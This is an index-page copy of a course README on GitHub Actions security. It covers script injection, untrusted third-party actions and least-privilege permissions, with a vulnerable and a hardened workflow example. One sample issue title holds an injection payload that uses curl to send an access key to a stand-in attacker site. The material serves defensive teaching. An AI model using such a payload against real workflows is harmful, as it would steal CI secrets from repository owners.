Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/carolinasfreitas/gha-security
Repository for the Security section of the course 'GitHub Actions - The Complete Guide'
- Host: GitHub
- URL: https://github.com/carolinasfreitas/gha-security
- Owner: CarolinaSFreitas
- Created: 2024-08-27T20:32:56.000Z (3 months ago)
- Default Branch: main
- Last Pushed: 2024-08-27T21:00:39.000Z (3 months ago)
- Last Synced: 2024-08-28T22:26:55.428Z (3 months ago)
- Size: 813 KB
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 0
Metadata Files:
- Readme: README.md
README
## Security Concerns in the Context of GitHub Actions
1. Script injections - a value set outside the workflow (for example an issue title) is interpolated into a workflow shell command; an attacker-controlled value can change the behaviour of the command or of the whole workflow
2. Malicious third-party actions - an action can run any logic, including malicious logic; example: a third-party action that reads and exports your secrets; only use trusted actions and inspect the code of unknown or untrusted authors
3. Permission issues - avoid overly permissive workflow permissions; example: only allow checking out code ("read-only"); GitHub Actions supports fine-grained permissions control

### Simple examples of injection
Opening issues with titles like
- ``"a"; curl http://my-bad-site.com?abc=$MINHA_ACCESS_KEY_ID"``

### Docs
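The script-injection and least-privilege points above side by side in one workflow, as an added example that is not part of the course repository; the workflow name, job name and the `TITLE` variable are assumptions:

```yaml
# Added example (not from the repository): an issue title reaching a shell step.
name: issue-triage
on:
  issues:
    types: [opened]

# Least privilege: this job only needs to read repository contents,
# so the default token is restricted to that.
permissions:
  contents: read

jobs:
  triage:
    runs-on: ubuntu-latest
    steps:
      # VULNERABLE: the ${{ }} expression is expanded into the script text
      # before the shell runs it, so a title containing a closing quote and
      # a `;` becomes part of the command line instead of staying data.
      - name: Echo title (vulnerable)
        run: echo "Issue title is ${{ github.event.issue.title }}"

      # HARDENED: pass the untrusted value through an environment variable.
      # The shell now reads $TITLE as a plain string; quotes and `;` inside
      # it have no effect on the command being executed.
      - name: Echo title (hardened)
        env:
          TITLE: ${{ github.event.issue.title }}   # assumed variable name
        run: echo "Issue title is $TITLE"
```

The same pattern applies to any other attacker-controlled event field (PR titles, bodies, branch names, commit messages): never place it inside `run:` directly.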
https://docs.github.com/en/actions/security-for-github-actions/security-hardening-your-deployments/about-security-hardening-with-openid-connect